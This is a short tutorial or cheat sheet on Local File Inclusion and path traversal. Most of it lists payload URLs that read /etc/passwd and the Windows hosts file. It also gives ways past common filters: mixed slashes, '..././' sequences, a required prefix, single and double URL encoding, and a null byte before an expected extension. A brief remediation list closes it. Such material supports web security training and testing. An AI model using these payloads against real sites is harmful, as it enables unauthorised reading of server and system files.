Local File Inclusion

Also known as LFI, when an attacker can get a website to include a file that was not intended to be an option for the application.

Following, we find some ways to leverage this vulnerability:

• Check if parameters in the URL receive the name of a file

#It's searching for a file
http://$url/$query?$param=hola.php
#We can try to access the system files
http://$url/$query?$param=/etc/passwd

---

• When it doesn't work directly, we can try to get to the root folder. This method is also known as Path Traversal.

On Linux server

#We use ../ to get to the root directory
http://$url/$query?$param=../../../../../etc/passwd

On Windows server

#We use ../ to get to the root directory
http://$url/$query?$param=../../../../../../WINDOWS/system32/drivers/etc/hosts

It is useful to put as many ../ as possible to get to the root folder

---

• Sometimes, we will need to check the page code to see the input conditions.

Case 1

The code is searching for a file whose name starts with file

Example source code

...
$file = str_replace( array( "../", "..\\" ), "", $file );
...

We can use the \ to bypass this verification

http://$url/$query?$param=..\/..\/..\/..\/etc/passwd

Also if we use ..././ the code will do the replacement and leave us anyway with ../, and we will also bypass this verification

http://$url/$query?$param=..././..././..././..././etc/passwd
http://$url/$query?$param=....//....//....//etc/passwd

Case 2

The code is searching for a file whose name starts with file

Example source code

...
if( !fnmatch( "file*", $file ) && $file != "include.php" ) {
...

We can set our input to start with a specific name or route to folder, to bypass this verification

http://$url/$query?$param=file/../../../../etc/passwd
http://$url/$query?$param=/var/www/images/../../../../etc/passwd

Case 3

When stripped any directory traversal sequences, we can URL encode, or even double URL encode, the ../ characters

http://$url/$query?$param=../../../etc/passwd #This don't work
http://$url/$query?$param=..%2f..%2f..%2fetc%2fpasswd #But this could
http://$url/$query?$param=..%252f..%252f..%252fetc%252fpasswd #Or even this

Case 4

If needed to end with an expected file extension, we can use a null byte (%00) to bypass it

http://$url/$query?$param=../../../etc/passwd%00.png   #Example

Remediation Actions

• Avoid passing user-supplied input to filesystem APIs

  • Validate the user input before processing it, for example, compare the user input with a whitelist of permitted values

• Sanitize input by allowing only expected characters like alphanumeric only, no dots, slashes, or protocols

• Ensure proper file path resolution and canonicalize the path